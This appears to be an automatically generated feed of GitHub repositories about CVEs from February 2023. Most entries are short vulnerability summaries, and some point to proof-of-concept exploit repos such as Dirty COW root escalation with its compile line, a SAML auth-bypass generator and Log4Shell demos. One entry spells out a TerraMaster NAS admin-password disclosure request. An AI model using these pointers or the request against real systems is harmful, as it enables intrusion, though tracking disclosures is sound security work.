**An arbitrary file upload vulnerability in Ftdms v3.1.6 allows attackers to execute arbitrary code via uploading a crafted JPG file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23135](https://github.com/Live-Hack-CVE/CVE-2023-23135) create time: 2023-02-08T18:15:26Z

**A Simple CVE-2022-39299 PoC exploit generator to bypass authentication in SAML SSO Integrations using vulnerable versions of passport-saml** : [doyensec/CVE-2022-39299_PoC_Generator](https://github.com/doyensec/CVE-2022-39299_PoC_Generator) create time: 2022-10-31T13:24:34Z

**Cross-Site Request Forgery (CSRF) vulnerability in SeoSamba for WordPress Webmasters plugin <= 1.0.5 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41620](https://github.com/Live-Hack-CVE/CVE-2022-41620) create time: 2023-02-08T16:01:44Z

**Cross-site Scripting (XSS) - Stored in GitHub repository btcpayserver/btcpayserver prior to 1.7.6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0747](https://github.com/Live-Hack-CVE/CVE-2023-0747) create time: 2023-02-08T16:01:48Z

**B&R APROL versions < R 4.2-07 doesn’t process correctly specially formatted data packages sent to port 55502/tcp, which may allow a network based attacker to cause an application Denial-of-Service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43765](https://github.com/Live-Hack-CVE/CVE-2022-43765) create time: 2023-02-08T13:51:20Z

**Insufficient validation of input parameters when changing configuration on Tbase server in B&R APROL versions < R 4.2-07 could result in buffer overflow. This may lead to Denial-of-Service conditions or execution of arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43764](https://github.com/Live-Hack-CVE/CVE-2022-43764) create time: 2023-02-08T13:51:16Z

**Insufficient check of preconditions could lead to Denial of Service conditions when calling commands on the Tbase server of B&R APROL versions < R 4.2-07. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43763](https://github.com/Live-Hack-CVE/CVE-2022-43763) create time: 2023-02-08T13:51:12Z

**Lack of verification in B&R APROL Tbase server versions < R 4.2-07 may lead to memory leaks when receiving messages CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43762](https://github.com/Live-Hack-CVE/CVE-2022-43762) create time: 2023-02-08T13:51:08Z

**Below code takes advantage of a known vulnerability [Dirty COW (CVE-2016-5195)] to escalate privileges and get root access. Before running, uncomment sc for your platform within main.c. Compilation: gcc main.c -o dirtycow -lpthread** : [guy-davidi/DirtyCow](https://github.com/guy-davidi/DirtyCow) create time: 2023-02-08T13:00:27Z

**no description** : [pierpaolosestito-dev/Log4Shell-CVE-2021-44228-PoC](https://github.com/pierpaolosestito-dev/Log4Shell-CVE-2021-44228-PoC) create time: 2023-02-08T12:19:32Z

**Improper Handling of Parameters vulnerability in Ipack Automation Systems Ipack SCADA Software allows : Blind SQL Injection.This issue affects Ipack SCADA Software: from unspecified before 1.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3958](https://github.com/Live-Hack-CVE/CVE-2021-3958) create time: 2023-02-08T11:37:29Z

**Missing authentication when creating and managing the B&R APROL database in versions < R 4.2-07 allows reading and changing the system configuration. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43761](https://github.com/Live-Hack-CVE/CVE-2022-43761) create time: 2023-02-08T11:37:04Z

**The Yellow Yard Searchbar WordPress plugin before 2.8.2 does not escape some URL parameters before outputting them back to the user, leading to Reflected Cross-Site Scripting CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2094](https://github.com/Live-Hack-CVE/CVE-2022-2094) create time: 2023-02-08T11:37:00Z

**Improper Access Control in GitHub repository answerdev/answer prior to 1.0.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0744](https://github.com/Live-Hack-CVE/CVE-2023-0744) create time: 2023-02-08T11:37:25Z

**Cross-site Scripting (XSS) - Generic in GitHub repository answerdev/answer prior to 1.0.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0743](https://github.com/Live-Hack-CVE/CVE-2023-0743) create time: 2023-02-08T11:37:20Z

**Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0742](https://github.com/Live-Hack-CVE/CVE-2023-0742) create time: 2023-02-08T11:37:17Z

**Cross-site Scripting (XSS) - DOM in GitHub repository answerdev/answer prior to 1.0.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0741](https://github.com/Live-Hack-CVE/CVE-2023-0741) create time: 2023-02-08T11:37:13Z

**Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0740](https://github.com/Live-Hack-CVE/CVE-2023-0740) create time: 2023-02-08T11:37:08Z

**ESXi EZ - A custom scanner that takes list of IPs either in JSON, CSV or individually and checks for infection CVE-2021-21974** : [CYBERTHREATANALYSIS/ESXi_ransomware_scanner](https://github.com/CYBERTHREATANALYSIS/ESXi_ransomware_scanner) create time: 2023-02-08T10:46:37Z

**The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_edit_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0726](https://github.com/Live-Hack-CVE/CVE-2023-0726) create time: 2023-02-08T07:13:33Z

**The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_clone_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0725](https://github.com/Live-Hack-CVE/CVE-2023-0725) create time: 2023-02-08T07:13:30Z

**The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_add_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0724](https://github.com/Live-Hack-CVE/CVE-2023-0724) create time: 2023-02-08T07:13:26Z

**The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_save_state function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0722](https://github.com/Live-Hack-CVE/CVE-2023-0722) create time: 2023-02-08T07:13:22Z

**The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_save_folder_order function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0720](https://github.com/Live-Hack-CVE/CVE-2023-0720) create time: 2023-02-08T07:13:19Z

**The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_delete_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perfo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0717](https://github.com/Live-Hack-CVE/CVE-2023-0717) create time: 2023-02-08T07:13:15Z

**The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_edit_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0716](https://github.com/Live-Hack-CVE/CVE-2023-0716) create time: 2023-02-08T07:13:12Z

**The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_clone_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perfor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0715](https://github.com/Live-Hack-CVE/CVE-2023-0715) create time: 2023-02-08T07:13:08Z

**The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_save_state function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0711](https://github.com/Live-Hack-CVE/CVE-2023-0711) create time: 2023-02-08T07:13:04Z

**The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_unassign_folders function. This makes it possible for unauthenticated attackers to invoke this function via forged request grant CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0685](https://github.com/Live-Hack-CVE/CVE-2023-0685) create time: 2023-02-08T07:13:01Z

**The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_unassign_folders function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and pe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0684](https://github.com/Live-Hack-CVE/CVE-2023-0684) create time: 2023-02-08T07:12:57Z

**Race Condition in Switch in GitHub repository answerdev/answer prior to 1.0.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0739](https://github.com/Live-Hack-CVE/CVE-2023-0739) create time: 2023-02-08T07:12:44Z

**Demonstration of the SQL injection vulnerability in wordpress 5.8.2** : [daniel616/CVE-2022-21661-Demo](https://github.com/daniel616/CVE-2022-21661-Demo) create time: 2023-02-08T04:58:57Z

**kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging the lack of stack-pointer alignment enforcement. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-17856](https://github.com/Live-Hack-CVE/CVE-2017-17856) create time: 2023-02-07T23:25:37Z

**The check_stack_boundary function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of invalid variable stack read operations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-17857](https://github.com/Live-Hack-CVE/CVE-2017-17857) create time: 2023-02-07T23:25:33Z

**kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging improper use of pointers in place of scalars. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-17855](https://github.com/Live-Hack-CVE/CVE-2017-17855) create time: 2023-02-07T23:25:30Z

**drivers/input/serio/i8042.c in the Linux kernel before 4.12.4 allows attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact because the port->exists value can change after it is validated. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-18079](https://github.com/Live-Hack-CVE/CVE-2017-18079) create time: 2023-02-07T23:25:26Z

**crypto/pcrypt.c in the Linux kernel before 4.14.13 mishandles freeing instances, allowing a local user able to access the AF_ALG-based AEAD interface (CONFIG_CRYPTO_USER_API_AEAD) and pcrypt (CONFIG_CRYPTO_PCRYPT) to cause a denial of service (kfree of an incorrect pointer) or possibly have unspecified other impact by CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-18075](https://github.com/Live-Hack-CVE/CVE-2017-18075) create time: 2023-02-07T23:25:22Z

**kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (integer overflow and memory corruption) or possibly have unspecified other impact by leveraging unrestricted integer values for pointer arithmetic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-17854](https://github.com/Live-Hack-CVE/CVE-2017-17854) create time: 2023-02-07T23:25:18Z

**An exploitable code execution vulnerability exists in the Web-Based Management (WBM) functionality of WAGO PFC 200 03.03.10(15). A specially crafted series of HTTP requests can cause code execution resulting in remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6090](https://github.com/Live-Hack-CVE/CVE-2020-6090) create time: 2023-02-07T23:25:12Z

**Directory Traversal vulnerability in AdminLTE 3.1.0 allows remote attackers to gain escalated privilege and view sensitive information via /admin/index2.html, /admin/index3.html URIs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36471](https://github.com/Live-Hack-CVE/CVE-2021-36471) create time: 2023-02-08T01:36:53Z

**LogicalDOC Enterprise and Community Edition (CE) are vulnerable to a stored (persistent, or "Type II") cross-site scripting (XSS) condition in the document version comments. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47418](https://github.com/Live-Hack-CVE/CVE-2022-47418) create time: 2023-02-08T01:36:57Z

**An issue was discovered on Microchip RN4870 1.43 devices. An attacker within BLE radio range can cause a denial of service by sending a cleartext encryption pause request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45192](https://github.com/Live-Hack-CVE/CVE-2022-45192) create time: 2023-02-08T01:36:42Z

**An issue was discovered on Microchip RN4870 1.43 devices. An attacker within BLE radio range can cause a denial of service by sending a pair confirm message with wrong values. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45191](https://github.com/Live-Hack-CVE/CVE-2022-45191) create time: 2023-02-08T01:36:39Z

**An issue was discovered on Microchip RN4870 1.43 devices. An attacker within BLE radio range can bypass passkey entry in the legacy pairing of the device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45190](https://github.com/Live-Hack-CVE/CVE-2022-45190) create time: 2023-02-08T01:36:35Z

**Nordic Semiconductor, Microchip Technology NRF5340-DK DT100112 was discovered to contain an issue which allows attackers to cause a Denial of Service (DoS) via a crafted ConReq packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40480](https://github.com/Live-Hack-CVE/CVE-2022-40480) create time: 2023-02-08T01:36:32Z

**An XSS vulnerability was discovered in the Mayan EDMS DMS. Successful XSS exploitation was observed in the in-product tagging system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47419](https://github.com/Live-Hack-CVE/CVE-2022-47419) create time: 2023-02-07T23:26:03Z

**LogicalDOC Enterprise and Community Edition (CE) are vulnerable to a stored (persistent, or "Type II") cross-site scripting (XSS) condition in the document file name. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47417](https://github.com/Live-Hack-CVE/CVE-2022-47417) create time: 2023-02-07T23:26:00Z

**LogicalDOC Enterprise is vulnerable to a stored (persistent, or "Type II") cross-site scripting (XSS) condition in the in-app chat system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47416](https://github.com/Live-Hack-CVE/CVE-2022-47416) create time: 2023-02-07T23:25:56Z

**LogicalDOC Enterprise and Community Edition (CE) are vulnerable to a stored (persistent, or "Type II") cross-site scripting (XSS) condition in the in-app messaging system (both subject and message bodies). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47415](https://github.com/Live-Hack-CVE/CVE-2022-47415) create time: 2023-02-07T23:25:52Z

**If an attacker has access to the console for OpenKM (and is authenticated), a stored XSS vulnerability is reachable in the document "note" functionality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47414](https://github.com/Live-Hack-CVE/CVE-2022-47414) create time: 2023-02-07T23:25:48Z

**Given a malicious document provided by an attacker, the OpenKM DMS is vulnerable to a stored (persistent, or "Type II") XSS condition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47413](https://github.com/Live-Hack-CVE/CVE-2022-47413) create time: 2023-02-07T23:25:44Z

**In GNU Less before 609, crafted data can result in "less -R" not filtering ANSI escape sequences sent to the terminal. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46663](https://github.com/Live-Hack-CVE/CVE-2022-46663) create time: 2023-02-07T23:25:41Z

**Serenissima Informatica Fast Checkin version v1.0 is vulnerable to Unauthenticated SQL Injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47770](https://github.com/Live-Hack-CVE/CVE-2022-47770) create time: 2023-02-07T23:25:08Z

**Cross site scripting (XSS) vulnerability in sourcecodester oretnom23 sales management system 1.0, allows attackers to execute arbitrary code via the product_name and product_price inputs in file print.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23026](https://github.com/Live-Hack-CVE/CVE-2023-23026) create time: 2023-02-08T01:37:33Z

**Cross Site Scripting (XSS) vulnerability in InvoicePlane 1.6 via filter_product input to file modal_product_lookups.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23011](https://github.com/Live-Hack-CVE/CVE-2023-23011) create time: 2023-02-08T01:37:29Z

**Cross-site Scripting (XSS) - Stored in GitHub repository wallabag/wallabag prior to 2.5.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0736](https://github.com/Live-Hack-CVE/CVE-2023-0736) create time: 2023-02-08T01:37:26Z

**Cross-Site Request Forgery (CSRF) in GitHub repository wallabag/wallabag prior to 2.5.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0735](https://github.com/Live-Hack-CVE/CVE-2023-0735) create time: 2023-02-08T01:37:22Z

**The Interactive Geo Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the action content parameter in versions up to, and including, 1.5.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with editor level CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0731](https://github.com/Live-Hack-CVE/CVE-2023-0731) create time: 2023-02-08T01:37:18Z

**The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_save_folder_order function. This makes it possible for unauthenticated attackers to invoke this function via forged request gran CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0730](https://github.com/Live-Hack-CVE/CVE-2023-0730) create time: 2023-02-08T01:37:15Z

**The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_delete_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0727](https://github.com/Live-Hack-CVE/CVE-2023-0727) create time: 2023-02-08T01:37:11Z

**The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_move_object function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0723](https://github.com/Live-Hack-CVE/CVE-2023-0723) create time: 2023-02-08T01:37:08Z

**The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_save_sort_order function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and per CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0719](https://github.com/Live-Hack-CVE/CVE-2023-0719) create time: 2023-02-08T01:37:04Z

**The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_move_object function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0712](https://github.com/Live-Hack-CVE/CVE-2023-0712) create time: 2023-02-08T01:37:00Z

**Onedev is a self-hosted Git Server with CI/CD and Kanban. In versions prior to 7.9.12 the algorithm used to generate access token and password reset keys was not cryptographically secure. Existing normal users (or everyone if it allows self-registration) may exploit this to elevate privilege to obtain administrator per CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24828](https://github.com/Live-Hack-CVE/CVE-2023-24828) create time: 2023-02-08T01:36:50Z

**The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_save_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0718](https://github.com/Live-Hack-CVE/CVE-2023-0718) create time: 2023-02-08T01:36:46Z

**The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_save_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0728](https://github.com/Live-Hack-CVE/CVE-2023-0728) create time: 2023-02-07T23:26:11Z

**The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_add_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0713](https://github.com/Live-Hack-CVE/CVE-2023-0713) create time: 2023-02-07T23:26:08Z

**A CWE-522: Insufficiently Protected Credentials vulnerability exists that could result in unwanted access to a DCE instance when performed over a network by a malicious third-party. This CVE is unique from CVE-2022-32520. Affected Products: Data Center Expert (Versions prior to V7.9.0) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32518](https://github.com/Live-Hack-CVE/CVE-2022-32518) create time: 2023-02-07T22:18:18Z

**An illegal memory access flaw was found in the binutils package. Parsing an ELF file containing corrupt symbol version information may result in a denial of service. This issue is the result of an incomplete fix for CVE-2020-16599. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4285](https://github.com/Live-Hack-CVE/CVE-2022-4285) create time: 2023-02-07T22:18:12Z

**An incorrect TLB flush issue was found in the Linux kernel’s GPU i915 kernel driver, potentially leading to random memory corruption or data leaks. This flaw could allow a local user to crash the system or escalate their privileges on the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4139](https://github.com/Live-Hack-CVE/CVE-2022-4139) create time: 2023-02-07T22:18:09Z

**A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted online data request messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32523](https://github.com/Live-Hack-CVE/CVE-2022-32523) create time: 2023-02-07T22:18:05Z

**Given a malicious document provided by an attacker, the ONLYOFFICE Workspace DMS is vulnerable to a stored (persistent, or "Type II") cross-site scripting (XSS) condition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47412](https://github.com/Live-Hack-CVE/CVE-2022-47412) create time: 2023-02-07T22:17:38Z

**The Icon Widget WordPress plugin before 1.3.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4763](https://github.com/Live-Hack-CVE/CVE-2022-4763) create time: 2023-02-07T22:17:32Z

**A CWE-200: Exposure of Sensitive Information to an Unauthorized Actor vulnerability exists that could cause information disclosure when specific messages are sent to the server over the database server TCP port. Affected Products: EcoStruxure Geo SCADA Expert 2019 - 2021 (formerly known as ClearSCADA) (Versions prior t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22611](https://github.com/Live-Hack-CVE/CVE-2023-22611) create time: 2023-02-07T22:17:58Z

**Contiki-NG is an open-source, cross-platform operating system for Next-Generation IoT devices. Versions prior to and including 4.8 are vulnerable to an out-of-bounds write that can occur in the BLE-L2CAP module. The Bluetooth Low Energy - Logical Link Control and Adaptation Layer Protocol (BLE-L2CAP) module handles fra CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23609](https://github.com/Live-Hack-CVE/CVE-2023-23609) create time: 2023-02-07T22:17:53Z

**A possible security vulnerability has been identified in Apache Kafka Connect. This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25194](https://github.com/Live-Hack-CVE/CVE-2023-25194) create time: 2023-02-07T22:17:45Z

**A vulnerability has been found in SourceCodester Online Eyewear Shop 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file oews/classes/Users.php of the component POST Request Handler. The manipulation of the argument firstname/middlename/lastname/lastname/contact lea CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0732](https://github.com/Live-Hack-CVE/CVE-2023-0732) create time: 2023-02-07T22:17:42Z

**A vulnerability classified as critical has been found in weblabyrinth 0.3.1. This affects the function Labyrinth of the file labyrinth.inc.php. The manipulation leads to sql injection. Upgrading to version 0.3.2 is able to address this issue. The name of the patch is 60793fd8c8c4759596d3510641e96ea40e7f60e9. It is reco CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-10002](https://github.com/Live-Hack-CVE/CVE-2011-10002) create time: 2023-02-07T20:03:40Z

**TerraMaster NAS 4.2.29 and earlier allows remote attackers to discover the administrative password by sending "User-Agent: TNAS" to module/api.php?mobile/webNasIPS and then reading the PWD field in the response. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24990](https://github.com/Live-Hack-CVE/CVE-2022-24990) create time: 2023-02-07T20:04:07Z

**A stored cross-site scripting vulnerability exists in the web application functionality of Moxa SDS-3008 Series Industrial Ethernet Switch 2.1. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can send an HTTP request to trigger this vulnerability.Form field id="switch_contact" CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41313](https://github.com/Live-Hack-CVE/CVE-2022-41313) create time: 2023-02-07T20:04:03Z

**A stored cross-site scripting vulnerability exists in the web application functionality of Moxa SDS-3008 Series Industrial Ethernet Switch 2.1. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can send an HTTP request to trigger this vulnerability.Form field id="Switch Descriptio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41312](https://github.com/Live-Hack-CVE/CVE-2022-41312) create time: 2023-02-07T20:03:59Z

**A stored cross-site scripting vulnerability exists in the web application functionality of Moxa SDS-3008 Series Industrial Ethernet Switch 2.1. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can send an HTTP request to trigger this vulnerability.Form field id="webLocationMessag CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41311](https://github.com/Live-Hack-CVE/CVE-2022-41311) create time: 2023-02-07T20:03:56Z

**A cleartext transmission vulnerability exists in the web application functionality of Moxa SDS-3008 Series Industrial Ethernet Switch 2.1. A specially-crafted network sniffing can lead to a disclosure of sensitive information. An attacker can sniff network traffic to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40693](https://github.com/Live-Hack-CVE/CVE-2022-40693) create time: 2023-02-07T20:03:52Z

**An information disclosure vulnerability exists in the web application functionality of Moxa SDS-3008 Series Industrial Ethernet Switch 2.1. A specially-crafted HTTP request can lead to a disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40691](https://github.com/Live-Hack-CVE/CVE-2022-40691) create time: 2023-02-07T20:03:48Z

**A denial of service vulnerability exists in the web server functionality of Moxa SDS-3008 Series Industrial Ethernet Switch 2.1. A specially-crafted HTTP message header can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40224](https://github.com/Live-Hack-CVE/CVE-2022-40224) create time: 2023-02-07T20:03:43Z

**no description** : [es0j/CVE-2023-0045](https://github.com/es0j/CVE-2023-0045) create time: 2023-02-07T19:12:41Z

**An out of bound write can occur when patching an Openshift object using the 'oc patch' functionality in OpenShift Container Platform before 3.7. An attacker can use this flaw to cause a denial of service attack on the Openshift master api service which provides cluster management. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-14632](https://github.com/Live-Hack-CVE/CVE-2018-14632) create time: 2023-02-07T17:53:09Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46621](https://github.com/Live-Hack-CVE/CVE-2022-46621) create time: 2023-02-07T17:53:23Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46620](https://github.com/Live-Hack-CVE/CVE-2022-46620) create time: 2023-02-07T17:53:20Z

**Insecure Permission vulnerability in Schlix Web Inc SCHLIX CMS 2.2.7-2 allows attacker to upload arbitrary files and execute arbitrary code via the tristao parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45544](https://github.com/Live-Hack-CVE/CVE-2022-45544) create time: 2023-02-07T17:53:16Z

**An issue discovered in src/wallet/wallet.cpp in Dogecoin Project Dogecoin Core 1.14.3 and earlier allows attackers to view sensitive information via CWallet::CreateTransaction() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37491](https://github.com/Live-Hack-CVE/CVE-2021-37491) create time: 2023-02-07T15:39:14Z

